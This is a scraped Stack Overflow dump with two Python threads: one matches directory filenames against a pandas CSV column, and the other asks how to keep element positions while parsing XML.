Match identical words in two prints | 38,745,163 | <p>I am using os to list the filenames within a directory. I am also using pandas to list the contents of one column in a CSV file. I have printed the results of both and now I want to match the names that appear in both prints and also identify which names are exclusive to one print. Below is my code which gets the names and the contents of the CSV file. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mydir/csvfile"
dirs = os.listdir( path )
for file in dirs:
print file
fields = ['Column']
df = pd.read_csv('/mydir/csv_file', skipinitialspace=True, usecols=fields)
print df.Column
</code></pre>
<p><strong>* EDIT *</strong></p>
<p>I have come up with this solution that works. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mdir/csvfile"
dirs = os.listdir( path )
list_1 = [file for file in dirs]
fields = ['column']
df = pd.read_csv('/mydir/csvfile', skipinitialspace=True, usecols=fields)
list_2 = df.column.values.tolist()
list_3=[]
for i in list_1:
if i in list_2:
list_3.append(i + " True")
else:
list_3.append(i + " False")
print list_3
</code></pre>
| 2 | 2016-08-03T13:33:19Z | 38,745,723 | <p>Instead of</p>
<pre><code>for file in dirs:
print file
</code></pre>
<p>Build a list:</p>
<pre><code>files = [file for file in dirs]
</code></pre>
<p>Then use the DataFrame to check:</p>
<pre><code>df.Column.isin(files) # this will check elementwise
Out:
0 True
1 True
2 True
3 True
Name: Column, dtype: bool
</code></pre>
<p>Or</p>
<pre><code>df.Column.isin(files).all() # if all of them are the same
Out: True
</code></pre>
| 2 | 2016-08-03T13:57:08Z | [
"python",
"csv",
"pandas"
] |
XML parsing in python while retaining link to position in original file | 38,745,263 | <p>I need to extract certain data from XML files, but also know the position where the extracted element was located in the original XML file - as a character offset from file beginning, or a line number + position in that line.</p>
<p>The commonly used python XML libraries don't seem to provide any such functionality.</p>
<p>There is a similar question <a href="http://stackoverflow.com/questions/28728498/obtaining-position-info-when-parsing-html-in-python">Obtaining position info when parsing HTML in Python</a> that was solved by writing a custom wrapper around html5lib; but that library won't work for me as the particular data is not HTML.</p>
<p>Are there any XML parsers that keep the element position information, or do I have to roll my own parsing for that?</p>
| 0 | 2016-08-03T13:37:02Z | 38,745,434 | <p>I don't think such things exists. Most parsers do the parsing first (manipulate the text stream into tokens and then parse it into a tree). By that time, they usually have a good knowledge of where they are in the original stream (this is required to output parsing errors). However once the object tree has been built this information is of small use and no longer accessible into the resulting objects.</p>
<p>A nice and ugly hack (at the same time!) would be to tokenize the XML input, add "position" attribute(s) refering to the original stream position, parse the XML with a regular library and use this attribute(s) later for user information...</p>
<p>Let us know how you did that!</p>
| 0 | 2016-08-03T13:45:00Z | [
"python",
"xml",
"elementtree"
] |